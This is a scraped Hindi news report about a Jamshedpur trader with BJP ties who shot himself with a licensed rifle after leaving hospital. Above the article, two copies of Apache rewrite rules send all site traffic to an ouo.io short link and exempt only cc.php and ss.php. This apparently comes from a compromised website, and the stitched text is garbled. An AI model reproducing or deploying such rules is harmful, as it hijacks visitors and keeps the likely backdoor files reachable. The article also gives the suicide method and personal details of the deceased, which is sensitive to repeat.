
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 385
जमशेदपुर। झारखण्ड में जमशेदपुर के उलीडीह थाना क्षेत्र के व्यापारी ने कल खुद को गोली मारकर आत्महत्या कर ली। मृतक बबलू वाजपेयी बीजेपी से जुड़ा हुआ बताया जा रहा है। मृतक का कारण मानसिक अवसाद बताया जा रहा है। मृतक के चाचा ने बताया कि कल बबलू का जन्मदिन था। रात साढ़े आठ बजे वह अपनी दुकान पर आया था। इसके कुछ देर बाद ही उसकी मौत की खबर आ गई। मौके पर पहुंचे डीएसपी कमलेश करमाड़ी ने बताया कि बबलू वाजपेयी काफी दिनों से बीमार चल रहा था। घटना से पहले वो टीएमएच अस्पताल में भर्ती था। वहां डॉक्टरों से जबरन छुट्टी लेकर घर आया और अपने कमरे में जाकर खुद को गोली मारकर आत्महत्या कर ली। गोली की आवाज सुनकर परिजन कमरे में पहुंचे तो देखा कि बबलू मृत पड़ा था। मृतक के घर पहुंचे एक भाजपा नेता ने कहा कि शाम को ही बबलू से बात हुई थी। बातचीत के दौरान ऐसा कतई नहीं लगा कि वो आत्महत्या कर लेगा। पुलिस ने मौके से लाइसेंसी रायफल जब्त कर ली है और शव को पोस्टमार्टम के लिए अस्पताल की मोर्चरी में रखवा दिया है।